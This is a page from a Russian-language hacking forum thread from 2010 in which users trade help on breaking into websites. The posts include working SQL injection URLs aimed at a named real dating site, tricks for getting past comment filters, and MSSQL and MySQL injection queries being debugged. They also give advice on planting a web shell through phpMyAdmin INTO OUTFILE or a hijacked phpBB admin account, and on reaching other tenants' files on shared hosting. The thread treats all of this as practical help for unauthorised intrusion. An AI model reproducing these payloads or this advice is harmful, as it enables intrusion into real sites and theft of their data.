Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
06.05.2010, 12:19
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.04.2009
Сообщений: 231
Провел на форуме:
3363660
Репутация:
1148
|
|
Сообщение от krypt3r
А в комбинации с RemoveType?
я тебя люблю) бес комбинации работает, то что надо! 
|
|
|
06.05.2010, 12:31
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от scorpic393
спс, может быть. ша поишу инклудов в двиге, токо трабла в том как слить сайт полность (скрипты)
подскажите плиз шелл или скрипт чтобы слить скрипты с сайта, wso2.4 не пакует в архив ((
pclzip.lib.php
|
|
|
|
06.05.2010, 13:06
|
|
Познающий
Регистрация: 21.07.2007
Сообщений: 68
Провел на форуме:
947074
Репутация:
257
|
|
Сообщение от durito
что-то фантазии не хвататет:
http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+order+by+36
Сообщение от b82a
Это MSSQL, скорее всего фильтруется, потому что при 1 or 1=@@version-- просто становится недоступен сайт
Сообщение от durito
b82a комментарий если убрать, то доступен, вылетает ошибка
Сообщение от pinch
значит фильтруется --
попробуй:
#
%-%-
%2D%2D
Вставлю свои 5 копеек...
http://www.freeukdatingsite.com/imagePop.asp?Item=@@version
http://www.freeukdatingsite.com/Notice_Details.asp?Item=7395+union+select+null,@@v ersion,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null,null,null,null,null,nul l,null,null,null,null,null
Напридумывали каких-то фильтров)
зы. Может я слишком плоско мыслью, но я не понимаю, зачем писать попробуй то..сё, если человек отписал с урл...
Последний раз редактировалось v1d0qz; 06.05.2010 в 16:55..
|
|
|
|
06.05.2010, 14:51
|
|
Новичок
Регистрация: 05.05.2010
Сообщений: 2
Провел на форуме:
10773
Репутация:
0
|
|
Имею доступ к phpmyadmin. На сервер установлен форум phpbb, можно ли как то управлять коталогом / из под рут
|
|
|
|
06.05.2010, 15:13
|
|
Участник форума
Регистрация: 01.09.2005
Сообщений: 194
Провел на форуме:
818095
Репутация:
34
|
|
Сообщение от burn90
Имею доступ к phpmyadmin. На сервер установлен форум phpbb, можно ли как то управлять коталогом / из под рут
Попробуй залить шелл через пхп май админ если есть разрешение на into outfile
|
|
|
|
06.05.2010, 15:57
|
|
Новичок
Регистрация: 01.04.2009
Сообщений: 14
Провел на форуме:
92038
Репутация:
10
|
|
Всем привет!
Интересует вопрос, какие способы есть в шаред хостингах для просмотра каталога(или файла), других пользователей
например:
/home/andrei/public_html/
/home/irina/public_html/
бывает часто что я не имею права на просмотр каталога и все то что внутри,
|
|
|
|
06.05.2010, 16:23
|
|
Участник форума
Регистрация: 26.07.2008
Сообщений: 267
Провел на форуме:
1343031
Репутация:
184
|
|
Сообщение от kfor
Попробуй залить шелл через пхп май админ если есть разрешение на into outfile
Намного лучше, залогинившись админом на форуме (расшифровав его хэш или временно изменив на свой), залить шелл через phpbb (в ветке по ней есть точное описание, если нужно).
|
|
|
|
06.05.2010, 17:10
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Сообщение от Zilt0
Всем привет!
Интересует вопрос, какие способы есть в шаред хостингах для просмотра каталога(или файла), других пользователей
например:
/home/andrei/public_html/
/home/irina/public_html/
бывает часто что я не имею права на просмотр каталога и все то что внутри,
Я так понял, что ты тоже зареган на подобном серваке и можешь работать токо в своей директории. Наверно и консолька есть...
Просмотр директорий других юзеров ты можешь добиться:
1) повышением прав на этом серваке, если найдешь соответствующий эксплоит под данную систему;
2) т.к. это web-хостинг, то можно попытаться взломать сайты хостящиеся здесь же;
3) если есть подключения к бд, то проверить возможность чтения файлов через load_file.
пока больше на ум ничего не приходит
|
|
|
|
06.05.2010, 18:37
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
ребят делаю запрос
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME='tbl_group_admin')--
результат
Ligne 1 : syntaxe incorrecte vers ')'.
делаю
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=CHAR(116,98,108,95,103,11 4,111,117,112,95,97,100,109,105,110))--
результат
a fonction char requiert 1 arguments.
(SELECT+TOP+1+COLUMN_NAME+FROM+INFORMATION_SCHEMA. COLUMNS+WHERE+TABLE_NAME=0x74626c5f67726f75705f616 46d696e)--
syntaxe incorrecte vers ')'
что посоветуете?
|
|
|
|
06.05.2010, 18:53
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
Есть сайт, делаю запрос:
http://test/news.php?id=-1+union+select+1,user(),3,4--
Выводит:
adeoo3@10.1.1.17
Хочу узнать права на чтение/запись файлов, делаю запрос:
http://test/news.php?id=-1+union+select+1,file_priv,3,4+from+mysql.user+whe re+user='adeoo3'--
Выводит:
SELECT command denied to user 'adeoo3'@'10.1.1.17' for table 'user'
Что это значит???
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
